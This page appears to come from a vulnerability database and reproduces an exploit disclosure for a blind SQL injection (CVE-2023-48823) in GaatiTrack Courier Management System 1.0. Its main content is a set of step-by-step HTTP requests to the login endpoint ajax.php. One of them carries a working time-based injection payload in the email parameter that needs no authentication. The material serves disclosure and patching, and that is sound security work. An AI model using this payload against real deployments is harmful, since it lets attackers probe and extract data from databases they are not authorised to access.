Lucene search
K

GaatiTrack Courier Management System 1.0 SQL Injection

🗓️ 04 Dec 2023 00:00:00Reported by Rahad Chowdhury, BugsBD LimitedType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 300 Views

GaatiTrack Courier Management System 1.0 SQL Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
GaatiTrack Courier Management System 1.0 SQL Injection Vulnerability
4 Dec 202300:00
zdt
ATTACKERKB
CVE-2023-48823
7 Dec 202307:15
attackerkb
Circl
CVE-2023-48823
30 Dec 202311:06
circl
CNNVD
GaatiTrack Courier Management System Security Vulnerability
7 Dec 202300:00
cnnvd
CVE
CVE-2023-48823
7 Dec 202300:00
cve
Cvelist
CVE-2023-48823
7 Dec 202300:00
cvelist
EUVD
EUVD-2023-52854
3 Oct 202520:07
euvd
NVD
CVE-2023-48823
7 Dec 202307:15
nvd
Prion
Sql injection
7 Dec 202307:15
prion
Positive Technologies
PT-2023-7516 · Unknown · Gaatitrack Courier Management System
13 Nov 202300:00
ptsecurity
Rows per page
`# Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection  
# Date: 13/11/2023  
# Exploit Author: BugsBD Limited  
# Discover by: Rahad Chowdhury  
# Vendor Homepage: https://www.mayurik.com/  
# Software Link:  
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php  
# Version: v1.0  
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56  
# CVE: CVE-2023-48823  
  
Descriptions:  
Blind SQL injection in ajax.php in GaatiTrack Courier Management  
System v1.0 allows an unauthenticated attacker to insert malicious SQL  
queries via email parameter.  
  
  
Steps to Reproduce:  
  
1. Request:  
  
POST /gaatitrack/ajax.php?action=login HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 83  
Origin: http://192.168.1.74  
Connection: close  
Referer: http://192.168.1.74/gaatitrack/login.php  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;  
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;  
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc  
  
email=test%40test.com&password=123456  
  
2. Now use blind sqli query after email parameter. So your request data will be:  
  
POST /gaatitrack/ajax.php?action=login HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 83  
Origin: http://192.168.1.74  
Connection: close  
Referer: http://192.168.1.74/gaatitrack/login.php  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;  
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;  
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc  
  
email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation